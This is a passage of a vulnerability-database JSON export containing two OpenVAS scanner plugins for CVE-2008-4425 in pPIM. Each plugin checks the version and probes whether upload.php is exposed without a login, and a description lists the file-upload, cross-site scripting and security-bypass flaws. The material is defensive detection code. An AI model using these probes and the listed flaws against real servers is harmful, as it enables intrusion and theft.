disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n\nport = http_get_port(default:80);\nif(!http_can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/ppim\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/Readme.txt\");\n buf = http_get_cache(item:url, port:port);\n\n if( \"pPIM\" >< buf ) {\n ver = eregmatch(string: buf, pattern: \"Version ([0-9\\.0-9]+)\");\n if ( !isnull(ver[1]) ) {\n version = int( str_replace(find: '.', string: ver[1], replace: \"\") );\n if( version > 0 && version <= 10 ) {\n report = report_fixed_ver( installed_version:version, fixed_version:\"None\");\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n } else {\n # perhaps user has removed Readme.txt\n url = string(dir, \"/upload.php\");\n buf = http_get_cache(item:url, port:port);\n if(!buf) continue;\n\n if( egrep(pattern: \"Location:.login\\.php\\?login=1\", string: buf) ) {\n\n url = string(dir, \"/upload.php?login=1\");\n req = http_get(item:url, port:port);\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(!buf) continue;\n\n if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n #user installed ppim without password protection#\n else if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2017-09-19T12:03:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4425"], "description": "This host is running pPIM. pPIM is an information manger that can hold contacts, events in a\n calendar, links, send emails, check email, store notes, and uploads files.\n\n pPIM is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\n\n Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n - steal cookie-based authentication credentials\n - delete local files within the context of the webserver process\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n - change user passwords\n\n These issues affect pPIM 1.0 and prior versions.\n\n Seee http://www.phlatline.org/index.php?page=prod-ppim and http://www.securityfocus.com/bid/30627\n for further informations.", "modified": "2017-09-18T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:100005", "href": "http://plugins.openvas.org/nasl.php?oid=100005", "type": "openvas", "title": "pPIM Multiple Remote Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: pPIM_multiple_remote_vulnerabilities.nasl 7170 2017-09-18 10:35:33Z cfischer $\n#\n# pPIM Multiple Remote Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"This host is running pPIM. pPIM is an information manger that can hold contacts, events in a\n calendar, links, send emails, check email, store notes, and uploads files.\n\n pPIM is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\n\n Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n - steal cookie-based authentication credentials\n - delete local files within the context of the webserver process\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n - change user passwords\n\n These issues affect pPIM 1.0 and prior versions.\n\n Seee http://www.phlatline.org/index.php?page=prod-ppim and http://www.securityfocus.com/bid/30627\n for further informations.\";\n\ntag_solution = \"Uninstall pPIM.\";\n\nif (description)\n{\n script_id(100005);\n script_version(\"$Revision: 7170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 12:35:33 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 16:07:07 +0100 (Mon, 02 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_cve_id(\"CVE-2008-4425\");\n script_bugtraq_id(30627);\n script_name(\"pPIM Multiple Remote Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/ppim\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/Readme.txt\");\n buf = http_get_cache(item:url, port:port);\n \n if( \"pPIM\" >< buf ) {\n ver = eregmatch(string: buf, pattern: \"Version ([0-9\\.0-9]+)\");\n if ( !isnull(ver[1]) ) {\n version = int( str_replace(find: '.', string: ver[1], replace: \"\") );\n if( version > 0 && version <= 10 ) {\n security_message( port:port );\n\texit( 0 );\n }\n }\n } else {\n # perhaps user has removed Readme.txt\n url = string(dir, \"/upload.php\");\n buf = http_get_cache(item:url, port:port);\n if( buf == NULL )continue;\n\n if( egrep(pattern: \"Location:.login\\.php\\?login=1\", string: buf) ) {\n\n url = string(dir, \"/upload.php?login=1\");\n req = http_get(item:url, port:port);\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:0);\n if( buf == NULL )continue;\n\n if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n #user installed ppim without password protection#\n else if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n } \n } \n}\n\nexit( 99 );\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}]}